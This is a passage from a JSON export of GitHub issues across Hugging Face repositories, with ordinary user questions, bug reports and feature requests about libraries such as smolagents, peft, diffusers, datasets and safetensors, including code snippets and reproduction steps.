the code (Executing this code, Execution logs) and the Final answer. \n\nThe return value from agent.run contains only the final response. \n\nI'm working on some demos for which I wanted to run a number of tasks, capture all the output (not just the final answer) and write them to an md or html file, so that I can show everything including the code generated by the agent without running the agents live in the demo. \n\nI tried logging, stdout, from contextlib import redirect_stdout, etc. but couldn't capture the full output to a variable. \n\nThanks, \n\n", "url": "https://github.com/huggingface/smolagents/issues/322", "state": "open", "labels": [], "created_at": "2025-01-23T02:50:34Z", "updated_at": "2025-01-23T13:17:49Z", "user": "KannamSridharKumar" }, { "repo": "huggingface/smolagents", "number": 312, "title": "how to exec a bin and use the output as agent arg ?", "body": "Hi,\nA simple exec tool such as exec(path, [args]) should be in the examples.\nThen an agent call such as \"use exec(/bin/ls, /bin), put the result in a SQL db (as bin-name) for later use, and tell me how many of them are scripts, while using sbx -z on each non-script\" would make a short example.", "url": "https://github.com/huggingface/smolagents/issues/312", "state": "open", "labels": [], "created_at": "2025-01-22T12:55:22Z", "updated_at": "2025-01-22T12:55:22Z", "user": "malv-c" }, { "repo": "huggingface/datatrove", "number": 326, "title": "How to choose the best timeout value in extractors?", "body": "Hi,\n\nI do not know how to choose the best timeout threshold for running an extractor.
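 Right now I just pass a fixed value (a sketch of my current usage, if I'm reading the API right; the value is arbitrary):\n\n```python\nfrom datatrove.pipeline.extractors import Trafilatura\n\n# Each document gets at most `timeout` seconds of extraction before it is skipped.\nextractor = Trafilatura(timeout=0.1)\n```\n\n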
Shouldn't this threshold be hardware-aware?", "url": "https://github.com/huggingface/datatrove/issues/326", "state": "open", "labels": [], "created_at": "2025-01-22T03:14:58Z", "updated_at": "2025-02-10T09:53:03Z", "user": "jordane95" }, { "repo": "huggingface/datasets", "number": 7377, "title": "Support for sparse arrays with the Arrow Sparse Tensor format?", "body": "### Feature request\n\nAI in biology is becoming a big thing. One thing that would be a huge benefit to the field that Huggingface Datasets doesn't currently have is native support for **sparse arrays**. \n\n\nArrow has support for sparse tensors. \nhttps://arrow.apache.org/docs/format/Other.html#sparse-tensor\n\n\nIt would be a big deal if Hugging Face Datasets supported sparse tensors as a feature type, natively. \n\n\n### Motivation\n\nThis is important for example in the field of transcriptomics (modeling and understanding gene expression), because a large fraction of the genes are not expressed (zero). More generally, in science, sparse arrays are very common, so adding support for them would be very beneficial; it would make just using Hugging Face Dataset objects a lot more straightforward and clean.\n\n\n### Your contribution\n\nWe can discuss this further once the team comments on what they think about the feature, and if there were previous attempts at making it work, and understanding their evaluation of how hard it would be. My intuition is that it should be fairly straightforward, as the Arrow backend already supports it.", "url": "https://github.com/huggingface/datasets/issues/7377", "state": "open", "labels": [ "enhancement" ], "created_at": "2025-01-21T20:14:35Z", "updated_at": "2025-01-30T14:06:45Z", "comments": 1, "user": "JulesGM" }, { "repo": "huggingface/peft", "number": 2339, "title": "Peft version upgrade from 0.4.0 to 0.14.0 results in \"No module named \\u0027peft.utils.config\\u0027\" error", "body": "### System Info\n\nHello,\n\nI'm migrating my sagemaker endpoint from the `huggingface-pytorch-inference:2.1.0-transformers4.37.0-gpu-py310-cu118-ubuntu20.04` image (which is being deprecated) to the `huggingface-pytorch-inference:2.3.0-transformers4.46.1-gpu-py311-cu121-ubuntu20.04-v1.0` image, which is supported.\n\nThis new version does not support the 0.4.0 version of peft, so we have upgraded to 0.14.0 and upgraded to a compatible diffusers version. The sagemaker endpoint deploys correctly with these new versions, but once it's run, we receive the following error:\n\n`No module named \\u0027peft.utils.config\\u0027`\n\nI dug around and found that there's no usage of peft.utils.config in our inference code. The only usage I could find is here, in the peft code itself: https://github.com/huggingface/peft/blob/main/src/peft/config.py. However, in this code, it looks like utils.config does not exist at all.\n\nHere's what I'm currently using:\ndiffusers==0.32.2\npeft==0.14.0\n\nIs the peft library somehow breaking itself by looking for a peft.utils.config that doesn't exist? Have I missed a step that would create the utils.config file?
Or is there another hidden dependency using peft.utils.config?\n\n### Who can help?\n\n@BenjaminBossan @sayakpaul \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nCreate a sagemaker endpoint using the new `huggingface-pytorch-inference:2.3.0-transformers4.46.1-gpu-py311-cu121-ubuntu20.04-v1.0` huggingface DLC image.\n\nUse a requirements.txt that looks like the following:\ndiffusers==0.32.2\npeft==0.14.0\n\nObserve that all requests to the sagemaker endpoint respond with 500 errors.\n\n### Expected behavior\n\nThe Sagemaker endpoint should continue to process requests as it did before the version upgrade (using peft 0.4.0)", "url": "https://github.com/huggingface/peft/issues/2339", "state": "closed", "labels": [], "created_at": "2025-01-21T20:00:07Z", "updated_at": "2025-03-02T15:03:46Z", "comments": 2, "user": "incchar" }, { "repo": "huggingface/smolagents", "number": 298, "title": "How to pass images as input to CodeAgent?", "body": "Hello,\n\nI want to pass an input image along with the prompt to `CodeAgent.run`. I see that there is an `additional_args` argument but when I pass the image as `{\"image\": \"path/to/image.png\"}`, the agent ends up loading the image via pytesseract to read the contents of the image instead of passing it to OpenAI/Anthropic directly. Is there any way that I can ensure that the image is passed along with the prompt so that the model can infer information from it instead of using external libraries to load the image when using the LiteLLM integration?\n\nMy code for reference:\n\n```\nagent = CodeAgent(\n tools=[],\n model=LiteLLMModel(\n model_id=\"openai/gpt-4o\",\n api_key=os.environ.get('OPENAI_API_KEY'),\n temperature=1,\n top_p=0.95,\n ),\n add_base_tools=True,\n additional_authorized_imports=[\"sqlite3\", \"csv\", \"json\", \"os\", \"datetime\", \"requests\", \"pandas\", \"numpy\", \"sys\"],\n max_steps=10,\n)\n\nagent.run(prompt, additional_args={\"image\": \"path/to/image.png\"})\n```", "url": "https://github.com/huggingface/smolagents/issues/298", "state": "closed", "labels": [], "created_at": "2025-01-21T17:14:27Z", "updated_at": "2025-02-18T18:41:27Z", "user": "DarshanDeshpande" }, { "repo": "huggingface/lerobot", "number": 650, "title": "use a camera", "body": "Can I use a camera to collect data and train?", "url": "https://github.com/huggingface/lerobot/issues/650", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-21T10:35:02Z", "updated_at": "2025-04-07T15:53:26Z", "user": "lwx2024" }, { "repo": "huggingface/transformers", "number": 35807, "title": "How to change data", "body": "\n\nhttps://huggingface.co/facebook/rag-token-nq\n\n```python\nfrom transformers import RagTokenizer, RagRetriever, RagTokenForGeneration\n\ntokenizer = RagTokenizer.from_pretrained(\"facebook/rag-token-nq\")\nretriever = RagRetriever.from_pretrained(\"facebook/rag-token-nq\", index_name=\"exact\", use_dummy_dataset=True)\nmodel = RagTokenForGeneration.from_pretrained(\"facebook/rag-token-nq\", retriever=retriever)\n\ninput_dict = tokenizer.prepare_seq2seq_batch(\"who holds the record in 100m freestyle\", return_tensors=\"pt\")\n\ngenerated = model.generate(input_ids=input_dict[\"input_ids\"])\nprint(tokenizer.batch_decode(generated, skip_special_tokens=True)[0])\n\n# should give michael phelps => sounds reasonable\n```\n\n
My attempts:\nhttps://github.com/kim90000/Attempts-with-facebook-rag-token-nq/blob/main/README.md", "url": "https://github.com/huggingface/transformers/issues/35807", "state": "closed", "labels": [], "created_at": "2025-01-21T06:17:09Z", "updated_at": "2025-02-28T08:03:38Z", "user": "kim90000" }, { "repo": "huggingface/accelerate", "number": 3356, "title": "how to config accelerate on 2 mac machines", "body": "https://huggingface.co/docs/accelerate/usage_guides/distributed_inference\n\nI use accelerate config, and when I run the model, it blocks and then gets an error, meaning it cannot connect to the given IP and port.\nWho can help me?", "url": "https://github.com/huggingface/accelerate/issues/3356", "state": "closed", "labels": [], "created_at": "2025-01-20T11:35:35Z", "updated_at": "2025-02-25T02:20:41Z", "user": "hsoftxl" }, { "repo": "huggingface/transformers.js", "number": 1160, "title": "How to use sentence-transformers/static-similarity-mrl-multilingual-v1 model?", "body": "### Question\n\nIf I try to use `sentence-transformers/static-similarity-mrl-multilingual-v1` it fails on `tokenizer.json` not found. Is it possible to somehow convert the model to use it? ONNX runtime is already there.", "url": "https://github.com/huggingface/transformers.js/issues/1160", "state": "open", "labels": [ "question" ], "created_at": "2025-01-19T15:09:18Z", "updated_at": "2025-01-19T17:27:49Z", "user": "michalkvasnicak" }, { "repo": "huggingface/diffusers", "number": 10606, "title": "pred_original_sample in FlowMatchEulerDiscreteScheduler", "body": "Will pred_original_sample be supported in FlowMatchEulerDiscreteScheduler? How to get the predicted x_0?", "url": "https://github.com/huggingface/diffusers/issues/10606", "state": "closed", "labels": [], "created_at": "2025-01-19T10:02:22Z", "updated_at": "2025-02-14T12:21:33Z", "comments": 2, "user": "haofanwang" }, { "repo": "huggingface/transformers.js", "number": 1157, "title": "When using StyleTTS/Kokoro for text-to-speech conversion, how can I get the conversion progress?", "body": "### Question\n\nWhen using StyleTTS/Kokoro for text-to-speech conversion, how can I get the conversion progress?\n\n```bash\nnpm i kokoro-js\n```\n\n```typescript\nimport { KokoroTTS } from \"kokoro-js\";\n\nconst model_id = \"onnx-community/Kokoro-82M-ONNX\";\nconst tts = await KokoroTTS.from_pretrained(model_id, {\n dtype: \"q8\", // Options: \"fp32\", \"fp16\", \"q8\", \"q4\", \"q4f16\"\n});\n\nconst text = \"Life is like a box of chocolates. You never know what you're gonna get.\";\nconst audio = await tts.generate(text, {\n // Use `tts.list_voices()` to list all available voices\n voice: \"af_bella\",\n});\naudio.save(\"audio.wav\");\n```\n\n", "url": "https://github.com/huggingface/transformers.js/issues/1157", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-18T03:36:28Z", "updated_at": "2025-10-13T04:46:59Z", "user": "emojiiii" }, { "repo": "huggingface/transformers.js", "number": 1154, "title": "Text generation pipeline memory spike", "body": "### Question\n\n## Description\nThe text generation pipeline has a memory spike at the start of every generation request and settles down after a few seconds. We tested this in a lower-VRAM and system-memory environment, and it failed to generate anything because of this issue.
also it generate nonsensical bunch of tokens if we pass a long context.\n\n### Screenshots\n![Image](https://github.com/user-attachments/assets/5b7c7d34-1d2c-4e3d-a8ec-fa76742171a2)\n\n- Input messages\n```\n[{\nrole: \"system\",\ncontent: \"You are a highly skilled meeting summarizer. Your role is to create comprehensive, well-organized summaries \n of meetings that capture all essential information while maintaining clarity and accessibility. Follow these \n guidelines to generate thorough meeting summaries:\n\nSTRUCTURE AND ORGANIZATION:\n1. Meeting Metadata\n - Date and time of the meeting\n - Duration\n - Meeting type/purpose\n - Attendees (with roles if specified)\n - Location/platform used\n\n2. Executive Summary\n - Brief 2-3 sentence overview capturing the meeting's main purpose and key outcomes\n - Highlight critical decisions or major announcements\n\n3. Detailed Discussion Points\n - Organize by agenda items or natural topic transitions\n - Maintain chronological order within each topic\n - Include for each discussion point:\n * Context and background information\n * Key arguments or perspectives shared\n * Questions raised and answers provided\n * Concerns or challenges mentioned\n * Solutions proposed\n * Related sub-topics that emerged\n\n4. Decisions and Action Items\n - Document all decisions made, including:\n * The final decision\n * Key factors that influenced the decision\n * Any dissenting opinions or concerns noted\n - For each action item, specify:\n * The assigned owner/responsible party\n * Specific deliverables or expected outcomes\n * Deadlines or timeframes\n * Dependencies or prerequisites\n * Resources needed or allocated\n\n5. Follow-up Items\n - Topics deferred to future meetings\n - Scheduled follow-up discussions\n - Required approvals or reviews\n - Outstanding questions requiring research\n\nIMPORTANT GUIDELINES:\n\nLanguage and Tone:\n- Use clear, professional language\n- Maintain objectivity in describing discussions\n- Avoid editorializing or interpreting beyond stated information\n- Use active voice for clarity and direct attribution\n- Include relevant direct quotes when they capture important points precisely\n\nDetail Preservation:\n- Capture nuanced discussions, not just high-level points\n- Document both majority and minority viewpoints\n- Include context for technical terms or project-specific references\n- Note any significant non-verbal elements (demonstrations, whiteboard sessions, etc.)\n- Preserve the rationale behind decisions, not just the outcomes\n\nOrganization Principles:\n- Use consistent formatting for similar types of information\n- Create clear hierarchical relationships between main topics and subtopics\n- Use bullet points and subpoints for complex items\n- Include cross-references when topics are interrelated\n- Maintain clear distinction between facts, opinions, and decisions\n\nQuality Checks:\n- Ensure all agenda items are addressed\n- Verify all action items have clear owners and deadlines\n- Confirm all decisions are documented with their context\n- Check that all participant contributions are fairly represented\n- Validate that no discussion points are orphaned or incomplete\n\nFORMAT SPECIFICATIONS:\n\n# Meeting Summary: Meeting Title\n\n## Meeting Details\n- Date: Date\n- Time: Start Time - End Time\n- Location: Location/Platform\n- Duration: Duration\n- Meeting Type: Type/Purpose\n\n### Attendees\n- Name (Role) - Meeting Lead\n- Names and roles of other attendees\n\n## Executive Summary\n2-3 sentences capturing key 
outcomes and major decisions\n\n## Key Decisions\n1. Decision 1\n - Context: Brief context\n - Outcome: Final decision\n - Rationale: Key factors\n\n2. Decision 2\n Same structure as above\n\n## Discussion Topics\n\n### 1. Topic 1\n#### Background\nContext and background information\n\n#### Key Points Discussed\n- Main point 1\n * Supporting detail\n * Supporting detail\n- Main point 2\n * Supporting detail\n * Supporting detail\n\n#### Outcomes\n- Specific outcome or conclusion\n- Any decisions made\n\n### 2. Topic 2\nSame structure as Topic 1\n\n## Action Items\n1. Action Item 1\n - Owner: Name\n - Deadline: Date\n - Deliverable: Specific expected outcome\n - Dependencies: Any prerequisites\n\n2. Action Item 2\n Same structure as above\n\n## Follow-up Items\n- Deferred topic 1\n- Scheduled follow-up 1\n- Outstanding question 1\n\n## Additional Notes\nAny important information that doesn't fit in the above categories\n\n\nFINAL VERIFICATION CHECKLIST:\n1. All agenda items addressed\n2. All decisions documented with context\n3. All action items have owners and deadlines\n4. All participant contributions included\n5. All technical terms explained\n6. All follow-up items clearly spe", "url": "https://github.com/huggingface/transformers.js/issues/1154", "state": "open", "labels": [ "question" ], "created_at": "2025-01-17T06:30:06Z", "updated_at": "2025-02-07T03:18:49Z", "user": "ashen007" }, { "repo": "huggingface/datasets", "number": 7372, "title": "Inconsistent Behavior Between `load_dataset` and `load_from_disk` When Loading Sharded Datasets", "body": "### Description\n\nI encountered an inconsistency in behavior between `load_dataset` and `load_from_disk` when loading sharded datasets. Here is a minimal example to reproduce the issue:\n\n#### Code 1: Using `load_dataset`\n```python\nfrom datasets import Dataset, load_dataset\n\n# First save with max_shard_size=10\nDataset.from_dict({\"id\": range(1000)}).train_test_split(test_size=0.1).save_to_disk(\"my_sharded_datasetdict\", max_shard_size=10)\n\n# Second save with max_shard_size=10\nDataset.from_dict({\"id\": range(500)}).train_test_split(test_size=0.1).save_to_disk(\"my_sharded_datasetdict\", max_shard_size=10)\n\n# Load the DatasetDict\nloaded_datasetdict = load_dataset(\"my_sharded_datasetdict\")\nprint(loaded_datasetdict)\n```\n**Output**:\n- `train` has 1350 samples.\n- `test` has 150 samples.\n\n#### Code 2: Using `load_from_disk`\n```python\nfrom datasets import Dataset, load_from_disk\n\n# First save with max_shard_size=10\nDataset.from_dict({\"id\": range(1000)}).train_test_split(test_size=0.1).save_to_disk(\"my_sharded_datasetdict\", max_shard_size=10)\n\n# Second save with max_shard_size=10\nDataset.from_dict({\"id\": range(500)}).train_test_split(test_size=0.1).save_to_disk(\"my_sharded_datasetdict\", max_shard_size=10)\n\n# Load the DatasetDict\nloaded_datasetdict = load_from_disk(\"my_sharded_datasetdict\")\nprint(loaded_datasetdict)\n```\n**Output**:\n- `train` has 450 samples.\n- `test` has 50 samples.\n\n### Expected Behavior\nI expected both `load_dataset` and `load_from_disk` to load the same dataset, as they are pointing to the same directory. However, the results differ significantly:\n- `load_dataset` seems to merge all shards, resulting in a combined dataset.\n- `load_from_disk` only loads the last saved dataset, ignoring previous shards.\n\n### Questions\n1. Is this behavior intentional? If so, could you clarify the difference between `load_dataset` and `load_from_disk` in the documentation?\n2. 
If this is not intentional, could this be considered a bug?\n3. What is the recommended way to handle cases where multiple datasets are saved to the same directory?\n\n\nThank you for your time and effort in maintaining this great library! I look forward to your feedback.", "url": "https://github.com/huggingface/datasets/issues/7372", "state": "open", "labels": [], "created_at": "2025-01-16T05:47:20Z", "updated_at": "2025-01-16T05:47:20Z", "comments": 0, "user": "gaohongkui" }, { "repo": "huggingface/safetensors", "number": 561, "title": "Feature Request: Support for Ellipsis (...) in Indexing", "body": "### Feature request\n\nThank you very much for your effort in maintaining this great project!\n\nI\u2019m writing to request the addition of support for ellipsis (...) in `safetensor.safe_open` indexing functionality. This would enhance usability and align SafeTensor\u2019s API more closely with the standard Python indexing conventions used in NumPy and PyTorch.\n\n\n### Motivation\n\n## What Does Ellipsis (...) Do?\n\nThe ellipsis (...) is a shorthand in Python indexing that simplifies working with multi-dimensional arrays. It allows users to skip explicitly specifying a subset of dimensions, particularly when dealing with high-dimensional data. For example:\n\n```python\ntensor[..., 0:100, 0:100]\n```\n\nThis indicates that all dimensions up to the last two should be included in their entirety. The `...` is dynamically replaced by as many colons (: or slice(None)) as needed to account for the unspecified dimensions.\n\n### Your contribution\n\nI can do a PR if it is considered relevant.\n\n## Workaround\n\nA class that deals with the key can be used to transform the key into a slice object, which is supported by safetensors.\n\n```python\nfrom typing import Union, Tuple, Any\nfrom itertools import islice\n\nclass SliceTransformer:\n __slots__ = ('ndim',) # Optimize memory usage\n\n def __init__(self, ndim: int):\n if not isinstance(ndim, int) or ndim < 1:\n raise ValueError(\"ndim must be a positive integer\")\n self.ndim = ndim\n\n def transform(self, key: Union[slice, int, Tuple[Any, ...], Any]) -> Tuple[slice, ...]:\n # Handle single key case without tuple conversion\n if isinstance(key, (slice, int)):\n result = [slice(key, key + 1) if isinstance(key, int) else key]\n result.extend(slice(None) for _ in range(self.ndim - 1))\n return tuple(result)\n\n if not isinstance(key, tuple):\n raise TypeError(f\"Unsupported key type: {type(key)}\")\n\n # Pre-allocate result list with known size\n result = []\n result_append = result.append # Local reference for faster access\n \n # Fast path for common case (no ellipsis)\n if Ellipsis not in key:\n for item in islice(key, self.ndim):\n result_append(slice(item, item + 1) if isinstance(item, int) else item)\n result.extend(slice(None) for _ in range(self.ndim - len(result)))\n return tuple(result[:self.ndim])\n\n # Handle ellipsis case\n ellipsis_idx = key.index(Ellipsis)\n remaining_dims = self.ndim - (len(key) - 1)\n \n # Pre-ellipsis items\n for item in islice(key, ellipsis_idx):\n result_append(slice(item, item + 1) if isinstance(item, int) else item)\n \n # Fill ellipsis slots\n result.extend(slice(None) for _ in range(remaining_dims))\n \n # Post-ellipsis items\n for item in islice(key, ellipsis_idx + 1, None):\n if item is Ellipsis:\n raise ValueError(\"Multiple ellipsis found in key\")\n result_append(slice(item, item + 1) if isinstance(item, int) else item)\n\n if len(result) != self.ndim:\n raise ValueError(f\"Key length {len(result)} 
does not match ndim {self.ndim}\")\n \n return tuple(result)\n\n def __getitem__(self, key):\n return self.transform(key)\n\n\nimport safetensors.numpy\nimport safetensors\ntoy_data = np.random.rand(3, 5, 7, 128, 128)\nsafetensors.numpy.save_file({\"data\": toy_data}, \"model.safetensors\")\n\n# Will not work\nwith safetensors.safe_open(\"model.safetensors\", \"np\") as tensor:\n tensor.get_slice(\"data\")[..., 0:100, 0:200]\n\n# Will work\nwith safetensors.safe_open(\"model.safetensors\", \"np\") as tensor:\n tensor_slice = tensor.get_slice(\"data\")\n tensor_shape = tensor_slice.get_shape()\n new_keys = SliceTransformer(ndim=len(tensor_shape))[..., 0:100, 0:100]\n tensor_slice[new_keys]\n```", "url": "https://github.com/huggingface/safetensors/issues/561", "state": "open", "labels": [], "created_at": "2025-01-14T05:13:54Z", "updated_at": "2025-01-14T05:13:54Z", "comments": 0, "user": "csaybar" }, { "repo": "huggingface/diffusers", "number": 10566, "title": "Unnecessary operations in `CogVideoXTransformer3DModel.forward()`?", "body": "### Describe the bug\n\nHere are few rows of codes in `CogVideoXTransformer3DModel.forward()` :\n```py\n # 3. Transformer blocks\n ...\n\n if not self.config.use_rotary_positional_embeddings:\n # CogVideoX-2B\n hidden_states = self.norm_final(hidden_states)\n else:\n # CogVideoX-5B\n hidden_states = torch.cat([encoder_hidden_states, hidden_states], dim=1)\n hidden_states = self.norm_final(hidden_states)\n hidden_states = hidden_states[:, text_seq_length:]\n\n # 4. Final block\n ...\n```\n\nwhere `self.norm_final` is a `LayerNorm` defined by:\n```py\nself.norm_final = nn.LayerNorm(inner_dim, norm_eps, norm_elementwise_affine)\n```\n\nSince the `normalized_shape` of `self.norm_final` is 1-dimension which means only the last dimension will be normalized, it seems that **the \"cat -> layernorm -> slice\" logic on the 2nd dimension in CogVideoX-5B branch is unnecessary because it does the same thing with**\n```py\nhidden_states = self.norm_final(hidden_states)\n```\n\nThese codes is imported via [PR#9203](https://github.com/huggingface/diffusers/pull/9203/files#diff-6e4d5c6638b71b7a0e7de21357c5b55ffd5ff6373dd1ced70070650855830173R469). @zRzRzRzRzRzRzR @yiyixuxu could you possibly walk me through why these changes were necessary? Thanks a lot for your help!\n\n### Reproduction\n\n.\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n.\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/10566", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2025-01-14T04:01:20Z", "updated_at": "2025-02-13T22:11:26Z", "comments": 2, "user": "townwish4git" }, { "repo": "huggingface/diffusers", "number": 10565, "title": "Different generation with `Diffusers` in I2V tasks for LTX-video", "body": "### Describe the bug\n\nHello, I encountered an issue with the generation when attempting the I2V task using `Diffusers`. Is there any difference between the `diffusers` implementation and the `LTX-video-inference scripts` in the I2V task? 
\n\n- The above is the result from the `inference.py`, and the following is the result generated with `diffuser`.\n- Prompts: `a person`\n\nhttps://github.com/user-attachments/assets/6e2aeeaf-c52b-402c-ae92-aff2d325464b\n\n\nhttps://github.com/user-attachments/assets/59f815ad-1746-4ec5-ae1c-a47dcfa0fd02\n\n\nhttps://github.com/user-attachments/assets/8ca3c79b-8003-4fa2-82b1-8ae17beccb9c\n\n\n\n- test img\n![ref](https://github.com/user-attachments/assets/e3638227-68cf-4510-b380-24071a9409fc)\n\n\nBesides, it seems that the text prompt has a significant impact on the I2V generation with 'diffusers'. Could I be missing any important arguments?\nhttps://huggingface.co/docs/diffusers/api/pipelines/ltx_video\n- results\n\n\nhttps://github.com/user-attachments/assets/c062c21f-5611-4860-ba17-441dd26a8913\n\n\nhttps://github.com/user-attachments/assets/991ec853-ee26-43a7-914b-622d115a9b7f\n\n\nhttps://github.com/user-attachments/assets/ff3e7f04-c17d-4f0a-9aba-2db68aae792d\n\n\nhttps://github.com/user-attachments/assets/f2699759-c36e-4839-bddd-37b84a85e2c7\n\n### Reproduction\n\n- for LTX-video generation\nhttps://github.com/Lightricks/LTX-Video/blob/main/inference.py\n```\npython inference.py \\\n --ckpt_path ./pretrained_models/LTX-Video \\\n --output_path './samples' \\\n --prompt \"A person.\" \\\n --input_image_path ./samples/test_cases.png \\\n --height 512 \\\n --width 512 \\\n --num_frames 49 \\\n --seed 42 \n```\n\n- for diffuser generation: it seems that the negative prompts are causing the issues. However, even when I remove them, the results are still not satisfactory.\n```\nimport argparse\nimport torch\nfrom diffusers import LTXVideoTransformer3DModel\nfrom diffusers import LTXImageToVideoPipeline\nfrom diffusers import FlowMatchEulerDiscreteScheduler, AutoencoderKLLTXVideo\nfrom diffusers.utils import export_to_video, load_image, load_video\n\n\nfrom moviepy import VideoFileClip, AudioFileClip\nimport numpy as np\nfrom pathlib import Path\nimport os\nimport imageio\nfrom einops import rearrange\nfrom PIL import Image\nimport random\n\ndef seed_everething(seed: int):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n\ndef generate_video(args):\n\n pipe = LTXImageToVideoPipeline.from_pretrained(args.ltx_model_path, torch_dtype=torch.bfloat16)\n pipe.to(\"cuda\")\n\n negative_prompt = \"worst quality, inconsistent motion, blurry, jittery, distorted\"\n\n image = load_image(args.validation_image)\n prompt = \"A person.\"\n negative_prompt = \"worst quality, inconsistent motion, blurry, jittery, distorted\"\n generator = torch.Generator(\n device=\"cuda\" if torch.cuda.is_available() else \"cpu\"\n ).manual_seed(42)\n\n video = pipe(\n image=image,\n prompt=prompt,\n guidance_scale=3,\n # stg_scale=1,\n generator=generator,\n callback_on_step_end=None,\n negative_prompt=negative_prompt,\n width=512,\n height=512,\n num_frames=49,\n num_inference_steps=50,\n decode_timestep=0.05,\n decode_noise_scale=0.025,\n\n ).frames[0]\n export_to_video(video, args.output_file, fps=24)\n```\n\n- for demo images with difference text prompts\n https://huggingface.co/docs/diffusers/api/pipelines/ltx_video\n\n```\nimport torch\nfrom diffusers import LTXImageToVideoPipeline\nfrom diffusers.utils import export_to_video, load_image\n\npipe = LTXImageToVideoPipeline.from_pretrained(\"./pretrained_models/LTX-Video\", torch_dtype=torch.bfloat16)\npipe.to(\"cuda\")\n\nimage = load_image(\"samples/image.png\")\nprompt = \"A young 
girl stands.\"\nnegative_prompt = \"worst quality, inconsistent motion, blurry, jittery, distorted\"\n\nvideo = pipe(\n image=image,\n prompt=prompt,\n negative_prompt=negative_prompt,\n width=704,\n height=480,\n num_frames=161,\n num_inference_steps=50,\n).frames[0]\nmodified_prompt = \"-\".join(prompt.split()[:14])\nexport_to_video(video, f\"samples/test_out/demo-{modified_prompt}.mp4\", fps=24)\n```\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\ntorch 2.4.1\ntorchao 0.7.0\ntorchvision 0.19.1\ndiffusers 0.32.1\npython 3.10\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/10565", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2025-01-14T03:24:06Z", "updated_at": "2025-09-09T07:21:31Z", "comments": 11, "user": "Kaihui-Cheng" }, { "repo": "huggingface/transformers.js", "number": 1146, "title": "Why does the local models keep downloading everyday?", "body": "### Question\n\nEvery day when I come back to chat with the local models via transformers.js it downloads the models again. Can't I persisted the downloaded model so that I can chat with them anytime instantly?\nThank you.", "url": "https://github.com/huggingface/transformers.js/issues/1146", "state": "closed", "labels": [ "question" ], "created_at": "2025-01-14T02:56:34Z", "updated_at": "2025-01-18T15:11:09Z", "user": "Nithur-M" }, { "repo": "huggingface/chat-ui", "number": 1646, "title": "Inline audio/video in the output", "body": "If a model returns a markdown content with an image (`![description](url)`), the chat-ui will display the image inline.\nIs there something similar for audio and video? How can a model return audio or video content to the user?\n\nI don't know if this is currently supported or not.\n\n(I'm using the OpenAI endpoint)\n\n\nbtw, tanks a lot for the project, it's very nice!\n", "url": "https://github.com/huggingface/chat-ui/issues/1646", "state": "open", "labels": [ "enhancement" ], "created_at": "2025-01-14T01:20:54Z", "updated_at": "2025-02-28T11:32:48Z", "comments": 1, "user": "laurentlb" }, { "repo": "huggingface/lerobot", "number": 633, "title": "[Question] How to set training to a local dataset?", "body": "Is there a way to train on a local dataset without manually adding the `local_files_only` arg to the `make_dataset` function of the train script?\n\nI have set the `LEROBOT_HOME` env variable. ", "url": "https://github.com/huggingface/lerobot/issues/633", "state": "closed", "labels": [ "question", "dataset" ], "created_at": "2025-01-13T15:27:00Z", "updated_at": "2025-10-08T08:37:55Z", "user": "tlpss" }, { "repo": "huggingface/lerobot", "number": 630, "title": "Removing episodes from LeRobotDataset", "body": "Hi, thanks for building this. It's great.\r\n\r\nIs there a way to easily remove episodes from a dataset. I had a decent amount of diversity in my episodes, and wanted to reduce it, so I had to remove ~1/2 of the episodes. Rather than rerecording them, I wanted to remove specified episodes (lets say all even episodes). Is there an easy way to do this? I'de tried just removing them from the `episodes.jsonl` file, but it seemed to load all of the episodes, and also deleting unwated episode videos/data and renaming the files through some issues when loading the datasets. 
Is there a better way to do this?", "url": "https://github.com/huggingface/lerobot/issues/630", "state": "closed", "labels": [ "question", "dataset", "stale" ], "created_at": "2025-01-13T01:22:32Z", "updated_at": "2025-10-17T12:07:56Z", "user": "andlyu" }, { "repo": "huggingface/safetensors", "number": 559, "title": "serialize & deserialize does not work as the documentation specify.", "body": "### System Info\n\n- `transformers` version: 4.42.3\r\n- Platform: Linux-6.8.0-51-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.25.2\r\n- Safetensors version: 0.5.2\r\n- Accelerate version: 0.27.0\r\n- Accelerate config: \tnot found\r\n- PyTorch version (GPU?): 2.3.1+cu121 (True)\r\n- Tensorflow version (GPU?): 2.15.0 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using distributed or parallel set-up in script?: \r\n- Using GPU in script?: \r\n- GPU type: NVIDIA GeForce RTX 3050 Laptop GPU\r\n\r\n\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Reproduction\n\nHi,\r\n\r\nI\u2019m unsure if this is expected behavior or a bug since it does not align with what the documentation for these functions describes. Below is the code to reproduce the issue:\n\n### Expected behavior\n\n```python\r\nimport numpy as np\r\nimport safetensors\r\nfrom safetensors.numpy import save_file, load\r\n\r\n# Save as a safetensors file\r\ndata_ran_uint16 = np.random.randint(0, 255, (2, 2, 2)).astype(np.uint16)\r\nsave_file({\"toy\": data_ran_uint16}, \"toy.safetensors\")\r\n\r\n# Deserialize the file\r\nwith open(\"toy.safetensors\", \"rb\") as f:\r\n fbytes = safetensors.deserialize(f.read())\r\n\r\n# Expected to work\r\nserialized = safetensors.serialize({\"toy\": fbytes[0][1]})\r\n\r\n# Workaround\r\nfbytes[0][1][\"data\"] = bytes(fbytes[0][1][\"data\"]) # I had to convert the bytearray to bytes\r\nfbytes[0][1][\"dtype\"] = \"uint16\" # I had to change the dtype to uint16\r\nfbytes[0][1][\"shape\"]\r\nserialized = safetensors.serialize({\"toy\": fbytes[0][1]})\r\nload(serialized)\r\n```", "url": "https://github.com/huggingface/safetensors/issues/559", "state": "open", "labels": [], "created_at": "2025-01-12T20:22:57Z", "updated_at": "2025-01-12T20:23:18Z", 